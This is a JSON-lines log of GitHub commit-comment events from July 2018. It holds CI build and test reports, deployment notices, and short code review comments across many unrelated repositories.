{"id":"7947420927","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665483,"position":null,"line":null,"path":null,"commit_id":"8e299231ae22b084b442c498ef8b07ccfd313cf1","created_at":"2018-07-11T02:40:20Z","updated_at":"2018-07-11T02:40:20Z","author_association":"NONE","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T02:40:20Z"}
{"id":"7947435972","type":"CommitCommentEvent","actor":{"login":"Sim2164"},"repo":{"name":"aseylys/KStock"},"payload":{"comment":{"id":29665509,"position":null,"line":null,"path":null,"commit_id":"e60de98dba17a127e1b6919294b8f7ac09268b31","created_at":"2018-07-11T02:45:50Z","updated_at":"2018-07-11T02:45:50Z","author_association":"NONE","body":"Here is my email simnellc@gmail.com"}},"created_at":"2018-07-11T02:45:50Z"}
{"id":"7947437653","type":"CommitCommentEvent","actor":{"login":"chriskrycho"},"repo":{"name":"mike-north/ember-concurrency"},"payload":{"comment":{"id":29665511,"position":null,"line":null,"path":null,"commit_id":"51767424d742a4a44be660a9d7bfeed6ef3e8122","created_at":"2018-07-11T02:46:28Z","updated_at":"2018-07-11T02:46:28Z","author_association":"NONE","body":"So this gets a number of things better, but inference for the `P` type basically always fails. You can write the `Task` type explicitly with it, though, which is better than nothing."}},"created_at":"2018-07-11T02:46:28Z"}
{"id":"7947442336","type":"CommitCommentEvent","actor":{"login":"yaox12"},"repo":{"name":"cathayandy/thu_qa_homepage"},"payload":{"comment":{"id":29665521,"position":null,"line":null,"path":null,"commit_id":"837acee95d0e21771848ef64c93f86c173190d6f","created_at":"2018-07-11T02:48:15Z","updated_at":"2018-07-11T02:48:15Z","author_association":"NONE","body":"厉害"}},"created_at":"2018-07-11T02:48:15Z"}
{"id":"7947442716","type":"CommitCommentEvent","actor":{"login":"rasa"},"repo":{"name":"Ash258/scoop-Ash258"},"payload":{"comment":{"id":29665522,"position":6,"line":null,"path":"Texlive.json","commit_id":"e790b9eba584d62c49b94d5e878c17898b6f14f3","created_at":"2018-07-11T02:48:24Z","updated_at":"2018-07-11T02:48:24Z","author_association":"NONE","body":"Use \"Freeware\""}},"created_at":"2018-07-11T02:48:24Z"}
{"id":"7947444062","type":"CommitCommentEvent","actor":{"login":"bkruep"},"repo":{"name":"bkruep/HTML-Projects"},"payload":{"comment":{"id":29665524,"position":null,"line":null,"path":null,"commit_id":"1e12caf76bf2219a8f42f7601b4bf42d4a6bed84","created_at":"2018-07-11T02:48:55Z","updated_at":"2018-07-11T02:48:55Z","author_association":"OWNER","body":","}},"created_at":"2018-07-11T02:48:55Z"}
{"id":"7947446847","type":"CommitCommentEvent","actor":{"login":"msridhar"},"repo":{"name":"wala/WALA"},"payload":{"comment":{"id":29665528,"position":null,"line":null,"path":null,"commit_id":"dc47e1da984120f33b8e1196441a4549f68a9840","created_at":"2018-07-11T02:50:01Z","updated_at":"2018-07-11T02:50:01Z","author_association":"MEMBER","body":"👍"}},"created_at":"2018-07-11T02:50:01Z"}
{"id":"7947447342","type":"CommitCommentEvent","actor":{"login":"Hauffo"},"repo":{"name":"mattpitkin/yamm"},"payload":{"comment":{"id":29665529,"position":null,"line":null,"path":null,"commit_id":"24302de4a9b01be92d17e73ad19ebea6ec62e1f7","created_at":"2018-07-11T02:50:11Z","updated_at":"2018-07-11T02:50:11Z","author_association":"NONE","body":"Thanks for your quick reply. Your advice is so important to me. I will look for another code. If not available online, I may develop YAMM by myself. I wish you could give me some guidance when I do such things. \r\n\r\nThank you again for your kindness!"}},"created_at":"2018-07-11T02:50:11Z"}
{"id":"7947451072","type":"CommitCommentEvent","actor":{"login":"17B01035"},"repo":{"name":"17B01035/binary_search"},"payload":{"comment":{"id":29665531,"position":null,"line":null,"path":null,"commit_id":"2bb31dbd05b6f4ec07ae55e498c7fed8e83d20a0","created_at":"2018-07-11T02:51:29Z","updated_at":"2018-07-11T02:51:29Z","author_association":"OWNER","body":"work.c以外は修正しました"}},"created_at":"2018-07-11T02:51:29Z"}
{"id":"7947454567","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665534,"position":null,"line":null,"path":null,"commit_id":"8e299231ae22b084b442c498ef8b07ccfd313cf1","created_at":"2018-07-11T02:52:50Z","updated_at":"2018-07-11T02:52:50Z","author_association":"NONE","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T02:52:50Z"}
{"id":"7947461432","type":"CommitCommentEvent","actor":{"login":"DhirajSurvase"},"repo":{"name":"LineageOS-MediaTek/proprietary_vendor_motorola"},"payload":{"comment":{"id":29665540,"position":null,"line":null,"path":null,"commit_id":"756f3fe077148b1a6b879488ce3c8afa02c20902","created_at":"2018-07-11T02:55:21Z","updated_at":"2018-07-11T02:55:21Z","author_association":"MEMBER","body":"😀"}},"created_at":"2018-07-11T02:55:21Z"}
{"id":"7947465460","type":"CommitCommentEvent","actor":{"login":"Xudong-Huang"},"repo":{"name":"trustnote/rust-trustnote"},"payload":{"comment":{"id":29665546,"position":null,"line":null,"path":null,"commit_id":"85fad71ed4f6f5dac3bf2521829a08d26217c667","created_at":"2018-07-11T02:56:52Z","updated_at":"2018-07-11T02:56:52Z","author_association":"CONTRIBUTOR","body":"ref #189 "}},"created_at":"2018-07-11T02:56:52Z"}
{"id":"7947472372","type":"CommitCommentEvent","actor":{"login":"chenzht"},"repo":{"name":"chenzht/chenzht.github.io"},"payload":{"comment":{"id":29665550,"position":null,"line":null,"path":null,"commit_id":"41958b210a2b955246973d8999688cc4515ce1ac","created_at":"2018-07-11T02:59:27Z","updated_at":"2018-07-11T02:59:27Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-11T02:59:27Z"}
{"id":"7952277588","type":"CommitCommentEvent","actor":{"login":"acastillo2015"},"repo":{"name":"acastillo2015/startboot"},"payload":{"comment":{"id":29676173,"position":null,"line":null,"path":null,"commit_id":"2adde2380a28fcc4dbc2ef4e809dee1850954268","created_at":"2018-07-11T20:00:01Z","updated_at":"2018-07-11T20:00:01Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/0c1e5e36-26ce-45db-8770-33a334102862?env_id=ibm%3Ayp%3Aus-south \"AJCEv2\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/7f2e58ba-71a5-490a-a062-38a7f84b912a?env_id=ibm%3Ayp%3Aus-south \"Pipeline\") deployed [startboot](https://github.com/acastillo2015/startboot/releases/tag/deploy-ibm-yp-us-south-acastillo-cl.ibm.com-Meetup-Chile-20180711-200001 \"deploy-ibm-yp-us-south-acastillo-cl.ibm.com-Meetup-Chile-20180711-200001\") to [Meetup Chile](https://console.bluemix.net/apps/e667e4d5-3a72-476e-a4e8-b4bb3eed3ee2?env_id=ibm:yp:us-south \"ibm:yp:us-south:acastillo@cl.ibm.com:Meetup Chile\"), including this commit"}},"created_at":"2018-07-11T20:00:01Z"}
{"id":"7952280738","type":"CommitCommentEvent","actor":{"login":"justsml"},"repo":{"name":"sean-blattenberger/trip-journal"},"payload":{"comment":{"id":29676184,"position":47,"line":42,"path":"src/components/App.js","commit_id":"932fc89efa41ec87f24ab8a2adcdf5c0e7969432","created_at":"2018-07-11T20:00:38Z","updated_at":"2018-07-11T20:00:38Z","author_association":"NONE","body":"Do you need to create the new `trip` object? Could you pass `newTrip` into JSON.stringify?"}},"created_at":"2018-07-11T20:00:38Z"}
{"id":"7952282294","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676187,"position":6,"line":4,"path":"src/containers/Beauty/Detail.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T20:00:57Z","updated_at":"2018-07-11T20:00:57Z","author_association":"CONTRIBUTOR","body":"Good start: according to [BEM](http://getbem.com/naming/) we should be using hyphens (-) to signify modifiers and underscores (_) to signify subcomponents.\r\n\r\nAlso they say have two of them for jokes. (Actually so you know they were put there to be used as BEM styles)\r\n\r\n`Beauty__inner` "}},"created_at":"2018-07-11T20:00:57Z"}
{"id":"7952285743","type":"CommitCommentEvent","actor":{"login":"karljohns0n"},"repo":{"name":"karljohns0n/xen-kernel"},"payload":{"comment":{"id":29676194,"position":null,"line":null,"path":null,"commit_id":"f47fd02d3bc0e6b4fbc725ee345f005f1a9ec957","created_at":"2018-07-11T20:01:38Z","updated_at":"2018-07-11T20:01:38Z","author_association":"OWNER","body":"Package 4.9.112-32 tested on el6 and el7, no dmesg regressions.\r\n\r\n```bash\r\n[root@node-tmp1 ~]# cat /proc/version \r\nLinux version 4.9.112-32.el6.x86_64 (mockbuild@build.aerisnetwork.net) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-23) (GCC) ) #1 SMP Wed Jul 11 13:03:26 EDT 2018\r\n\r\n[root@ ~]# cat /proc/version \r\nLinux version 4.9.112-32.el7.x86_64 (mockbuild@build.aerisnetwork.net) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-28) (GCC) ) #1 SMP Wed Jul 11 14:14:53 EDT 2018\r\n```\r\n"}},"created_at":"2018-07-11T20:01:38Z"}
{"id":"7952286600","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676198,"position":15,"line":19,"path":"src/containers/Beauty/Detail.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T20:01:49Z","updated_at":"2018-07-11T20:01:49Z","author_association":"CONTRIBUTOR","body":"following the above this would be:\r\n\r\n`Beauty__title`\r\n\r\nIn CSS if the class name has a space then the words are attached as two separate classes."}},"created_at":"2018-07-11T20:01:49Z"}
{"id":"7952287961","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676203,"position":24,"line":27,"path":"src/containers/Beauty/Detail.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T20:02:07Z","updated_at":"2018-07-11T20:02:07Z","author_association":"CONTRIBUTOR","body":"As above:\r\n\r\n`Beauty__inner`"}},"created_at":"2018-07-11T20:02:07Z"}
{"id":"7952289142","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676208,"position":33,"line":36,"path":"src/containers/Beauty/Detail.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T20:02:20Z","updated_at":"2018-07-11T20:02:20Z","author_association":"CONTRIBUTOR","body":"`Beauty__image`"}},"created_at":"2018-07-11T20:02:20Z"}
{"id":"7952290487","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"Angan7a/Cars"},"payload":{"comment":{"id":29676209,"position":27,"line":21,"path":"main.cpp","commit_id":"f95f1e90a2d611ff187c621faff99ec0982e3787","created_at":"2018-07-11T20:02:38Z","updated_at":"2018-07-11T20:02:38Z","author_association":"NONE","body":"Zakomentowanego kodu nie ma sensu zostawiać. Po jest system kontroli wersji, żeby móc dzięki niemu zobaczyć jak to dawniej było w kodzie zrobione. A więc cały zakomentowany kod wywalaj od razu :)"}},"created_at":"2018-07-11T20:02:38Z"}
{"id":"7952290777","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676211,"position":54,"line":45,"path":"src/containers/Beauty/Detail.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T20:02:42Z","updated_at":"2018-07-11T20:02:42Z","author_association":"CONTRIBUTOR","body":"this import can go to, otherwise top work "}},"created_at":"2018-07-11T20:02:42Z"}
{"id":"7952293923","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676219,"position":5,"line":2,"path":"src/containers/Lifestyle/Detail.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T20:03:23Z","updated_at":"2018-07-11T20:03:23Z","author_association":"CONTRIBUTOR","body":"Hold off after you've got one of the files correct, afterwards give me a call and I'll show you some find/replace magic than can fix the rest using the rules you applied above"}},"created_at":"2018-07-11T20:03:23Z"}
{"id":"7952294434","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29676223,"position":null,"line":null,"path":null,"commit_id":"9729fd86d861514b2d18dec0abbd191d9aa1a043","created_at":"2018-07-11T20:03:30Z","updated_at":"2018-07-11T20:03:30Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-11T20:03:30Z"}
{"id":"7952294939","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29676226,"position":null,"line":null,"path":null,"commit_id":"677c051c5710f95fa1ed574c4a9731c6b3967743","created_at":"2018-07-11T20:03:37Z","updated_at":"2018-07-11T20:03:37Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-27](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-27).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-27-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-11T20:03:37Z"}
{"id":"7952296159","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676229,"position":53,"line":43,"path":"src/containers/Lifestyle/Detail.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T20:03:53Z","updated_at":"2018-07-11T20:03:53Z","author_association":"CONTRIBUTOR","body":"Ok this file is smaller than I thought, feel free to apply to both / call / whatevs you got this"}},"created_at":"2018-07-11T20:03:53Z"}
{"id":"7952296814","type":"CommitCommentEvent","actor":{"login":"vanmh"},"repo":{"name":"kiva/vertex"},"payload":{"comment":{"id":29676232,"position":null,"line":null,"path":null,"commit_id":"62fb8010d6a1509e775bb561e5c5a3bca168fc45","created_at":"2018-07-11T20:04:01Z","updated_at":"2018-07-11T20:04:01Z","author_association":"MEMBER","body":"deleted the branch.\n\nOn Wed, Jul 11, 2018 at 12:33 PM Rob Schoenbeck <notifications@github.com>\nwrote:\n\n> @vanmh <https://github.com/vanmh> Feels like this is probably out of date\n> now?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kiva/vertex/commit/62fb8010d6a1509e775bb561e5c5a3bca168fc45#commitcomment-29675890>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AASVAtWpD1YegC0bwsBer1cCBCQv3Qm2ks5uFlMHgaJpZM4VLt9s>\n> .\n>\n\n\n-- \n\n*Van Mittal-Henkle | Sr. Software Engineer*\n\n*Kiva.org – Loans that Change Lives*\n\n875 Howard St, Ste #340, San Francisco, CA 94103\n"}},"created_at":"2018-07-11T20:04:01Z"}
{"id":"7952298641","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"Angan7a/Cars"},"payload":{"comment":{"id":29676238,"position":6,"line":7,"path":"ElectricCar.cpp","commit_id":"31069bf8dd3a2ddd3561ddf531f94031d998323d","created_at":"2018-07-11T20:04:23Z","updated_at":"2018-07-11T20:04:23Z","author_association":"NONE","body":"super, znalazłeś wycieki pamięci :+1: "}},"created_at":"2018-07-11T20:04:23Z"}
{"id":"7952301007","type":"CommitCommentEvent","actor":{"login":"wakadori2"},"repo":{"name":"wakadori2/VarianceGAN"},"payload":{"comment":{"id":29676246,"position":null,"line":null,"path":null,"commit_id":"e67fc1c77aca999e7b63a4803ba44003b3bca359","created_at":"2018-07-11T20:04:54Z","updated_at":"2018-07-11T20:04:54Z","author_association":"OWNER","body":"189の更新部分を181にマージ。これ用のブランチを作ったほうが良いかも。"}},"created_at":"2018-07-11T20:04:54Z"}
{"id":"7952301535","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29676251,"position":null,"line":null,"path":null,"commit_id":"aad3dfe4891a5c14b8595de4d317cfe3fbfcee96","created_at":"2018-07-11T20:05:01Z","updated_at":"2018-07-11T20:05:01Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-45](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-45-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-11T20:05:01Z"}
{"id":"7952308719","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"jazzband/django-configurations"},"payload":{"comment":{"id":29676263,"position":11,"line":240,"path":"docs/values.rst","commit_id":"1c6fd0f505ca9ce6ed71ea44d92a97ec60a9befc","created_at":"2018-07-11T20:06:34Z","updated_at":"2018-07-11T20:06:34Z","author_association":"CONTRIBUTOR","body":"@jezdez \r\nDone in b1d92cf."}},"created_at":"2018-07-11T20:06:34Z"}
{"id":"7952309701","type":"CommitCommentEvent","actor":{"login":"LarryRuane"},"repo":{"name":"LarryRuane/protothread-multicore"},"payload":{"comment":{"id":29676268,"position":179,"line":265,"path":"protothread.c","commit_id":"dbf979230574b24979126a7cd84c0e690cfd947c","created_at":"2018-07-11T20:06:47Z","updated_at":"2018-07-11T20:06:47Z","author_association":"OWNER","body":"Having multiple pthreads run protothreads causes bad performance because nearly every protothread context switch results in a pthread context switch (which are relatively slow). It's easy to see that by increasing the number of iterations (`N`) for `protothread_test.c: test_pc()`. All that test does is create two protothreads that resume each other, so the the entire load is context switching. (You can disable the other tests by setting their enable flags to `false` near the bottom of the file.)\r\n\r\nAdding this monitor pthread is an attempted improvement, but I'm not sure this is the best approach. Starting with this commit, we no longer wake up (or start new) worker pthreads when a protothread becomes runnable, which means that, at least initially, all protothreads run on a single pthread (and thus a single core). This is very efficient (protothread context switching within a single pthread is extremely fast), but also of course defeats the entire purpose of this multicore project.\r\n\r\nSo what this monitor pthread does is to notice when it might be a good time to spin up another pthread to help run protothreads. The heuristic it uses to decide to do this is to notice if the same protothread has been at waiting at the head of the `ready` (run) queue for a significant amount of time (significant being somewhat arbitrarily defined as 10ms). If so, that means that the currently-running protothread has not given up the pthread in that amount of time -- either it's computing or blocking within a system call.\r\n\r\nThe 10ms should be somewhere in the range of a pthread spinup or context switch time. If it's too large, the overall protothread system won't be very responsive to increased load (a runnable protothread can wait for too long for a pthread to start up). But it should also not be too frequent that the monitor pthread uses a noticeable amount of CPU time. The current time, 10ms, seems to be a good balance.\r\n\r\nTo get an idea of the performance difference this makes, I increased `N` (iteration count, just above `producer_thr()`) from 10k to 100m. With this change, real time and cpu time are 22.3s (the entire test runs within a single pthread, as it should). Without this change, the times are 14m39s and 48m30s respectively (the cpu time is greater than real time because multiple cores were running the test). This is a real-time ratio of about 39:1. So this change does cause a huge improvement, at least for this simple (and worst-case) test."}},"created_at":"2018-07-11T20:06:47Z"}
{"id":"7952309756","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29676269,"position":null,"line":null,"path":null,"commit_id":"dbcec24aca49797b45042dc69378d19067e4c60a","created_at":"2018-07-11T20:06:48Z","updated_at":"2018-07-11T20:06:48Z","author_association":"CONTRIBUTOR","body":"As far as I can see the whole `CredentialsTest` doesn't perform any `git fetch` anymore. Therefore it cannot be asserted anymore. This log check has to moved to another test then."}},"created_at":"2018-07-11T20:06:48Z"}
{"id":"7952311155","type":"CommitCommentEvent","actor":{"login":"bradcray"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":29676270,"position":4,"line":114,"path":"modules/standard/GMP.chpl","commit_id":"63389bbd9713d45871db1f821d71993646556c9c","created_at":"2018-07-11T20:07:08Z","updated_at":"2018-07-11T20:07:08Z","author_association":"MEMBER","body":"Hi @mppf:  What makes these `export` functions?  I'm not seeing any calls to them in a `git grep`...  (Tagging @lydia-duncan with whom I was wondering about this)"}},"created_at":"2018-07-11T20:07:08Z"}
{"id":"7952314086","type":"CommitCommentEvent","actor":{"login":"CheviSutt"},"repo":{"name":"CheviSutt/Project4MTECH"},"payload":{"comment":{"id":29676277,"position":null,"line":null,"path":null,"commit_id":"b6cf4d6b4496ca32efd074a65c48d49f6e470ff7","created_at":"2018-07-11T20:07:46Z","updated_at":"2018-07-11T20:07:46Z","author_association":"OWNER","body":"I believe this one was passing"}},"created_at":"2018-07-11T20:07:46Z"}
{"id":"7952314373","type":"CommitCommentEvent","actor":{"login":"gersonbonfim"},"repo":{"name":"gersonbonfim/hello-world"},"payload":{"comment":{"id":29676278,"position":3,"line":3,"path":"README.md","commit_id":"c573c47eedcf29345eece7b72694b19b0292e211","created_at":"2018-07-11T20:07:50Z","updated_at":"2018-07-11T20:07:50Z","author_association":"OWNER","body":"I'm doing things"}},"created_at":"2018-07-11T20:07:50Z"}
{"id":"7952319828","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"Angan7a/Cars"},"payload":{"comment":{"id":29676289,"position":6,"line":6,"path":"InvalidGear.cpp","commit_id":"74831def419c53cd7d1f7904f21f8fb00d86e227","created_at":"2018-07-11T20:09:03Z","updated_at":"2018-07-11T20:09:03Z","author_association":"NONE","body":"rozwiązanie jest poprawne, ale warto podziedziczyć po jakimś standardowym wyjątku i wypisywanie w bloku catch zrealizować i używać tam funkcji what()"}},"created_at":"2018-07-11T20:09:03Z"}
{"id":"7952321747","type":"CommitCommentEvent","actor":{"login":"sjau"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29676292,"position":null,"line":null,"path":null,"commit_id":"43a737b81cd3f41f1df0f4f0bef25e048ac9155a","created_at":"2018-07-11T20:09:29Z","updated_at":"2018-07-11T20:09:29Z","author_association":"CONTRIBUTOR","body":"This doesn't work. Can't get pool imported. Tried with\r\n\r\n```\r\nboot.kernelPackages = pkgs.linuxPackages_latest; # use latest kernel\r\n```\r\nand without it on Nixos Unstable Small.\r\n\r\nI hanged at trying to import root pool."}},"created_at":"2018-07-11T20:09:29Z"}
{"id":"7952324687","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29676296,"position":null,"line":null,"path":null,"commit_id":"bae9bc2e841a059e7306d3ca368db3256943461c","created_at":"2018-07-11T20:10:07Z","updated_at":"2018-07-11T20:10:07Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-MacOS-10.9-clang: OK (2916 of 2926 tests passed, 13 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 14 tests had: EIO diffs.\n * 4 tests had: ESO small diffs.\n * 4 tests had: Table small diffs.\n * 1 test had: BND diffs.\n * 10 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 5 tests had: MTR big diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 613\n * Failed: 10\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bae9bc2e841a059e7306d3ca368db3256943461c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bae9bc2e841a059e7306d3ca368db3256943461c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T20:10:07Z"}
{"id":"7952326051","type":"CommitCommentEvent","actor":{"login":"przytular"},"repo":{"name":"django-haystack/django-haystack"},"payload":{"comment":{"id":29676298,"position":14,"line":160,"path":"docs/installing_search_engines.rst","commit_id":"eab8e1c5ac01df6fdec2b6da7ea6982dc929480d","created_at":"2018-07-11T20:10:23Z","updated_at":"2018-07-11T20:10:23Z","author_association":"NONE","body":"Sorry, but with ES 5.x it returns that error:\r\nhttps://github.com/django-haystack/django-haystack/issues/1579\r\n\r\nI don't think it is supported."}},"created_at":"2018-07-11T20:10:23Z"}
{"id":"7952326682","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":29676300,"position":4,"line":114,"path":"modules/standard/GMP.chpl","commit_id":"63389bbd9713d45871db1f821d71993646556c9c","created_at":"2018-07-11T20:10:31Z","updated_at":"2018-07-11T20:10:31Z","author_association":"CONTRIBUTOR","body":"I think I marked them export because the mp_set_memory_functions call was originally in the runtime & then I forgot to remove export when I moved that to the module init here. AFAIK they can be un-exported if that helps matters in some way."}},"created_at":"2018-07-11T20:10:31Z"}
{"id":"7952327561","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"alphapapa/helm-org-rifle"},"payload":{"comment":{"id":29676302,"position":null,"line":null,"path":null,"commit_id":"a6324b7f5157e3e91a7993efb87ece6b9ca449a9","created_at":"2018-07-11T20:10:43Z","updated_at":"2018-07-11T20:10:43Z","author_association":"OWNER","body":"@akirak Oops, I decided to do a 1.6.0 release and rebase these on top of that.  So this is the commit that I asked for feedback on before.  (Again, only if you feel like it.  :)"}},"created_at":"2018-07-11T20:10:43Z"}
{"id":"7952328555","type":"CommitCommentEvent","actor":{"login":"Loirooriol"},"repo":{"name":"tc39/proposal-object-from-entries"},"payload":{"comment":{"id":29676303,"position":6,"line":28,"path":"spec.html","commit_id":"f3f9a7be19ed0a4009531d35ce953070903d7557","created_at":"2018-07-11T20:10:57Z","updated_at":"2018-07-11T20:10:57Z","author_association":"CONTRIBUTOR","body":"Did you mean \"the**n** return\"?"}},"created_at":"2018-07-11T20:10:57Z"}
{"id":"7952332179","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"JJackiewicz/zadanie-15.5"},"payload":{"comment":{"id":29676314,"position":30,"line":30,"path":"components/App.js","commit_id":"db79ace4d52bd98350cfc114b979c76dd81261ee","created_at":"2018-07-11T20:11:45Z","updated_at":"2018-07-11T20:11:45Z","author_association":"NONE","body":"skąd tutaj `this`? "}},"created_at":"2018-07-11T20:11:45Z"}
{"id":"7952333139","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"JJackiewicz/zadanie-15.5"},"payload":{"comment":{"id":29676315,"position":30,"line":30,"path":"components/App.js","commit_id":"db79ace4d52bd98350cfc114b979c76dd81261ee","created_at":"2018-07-11T20:11:57Z","updated_at":"2018-07-11T20:11:57Z","author_association":"NONE","body":"powinno być `xhr`"}},"created_at":"2018-07-11T20:11:57Z"}
{"id":"7952338845","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29676326,"position":null,"line":null,"path":null,"commit_id":"b0ae481f23d975aff485816c107a6b4c4f7d2709","created_at":"2018-07-11T20:13:10Z","updated_at":"2018-07-11T20:13:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-461](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-461).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-461-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-11T20:13:10Z"}
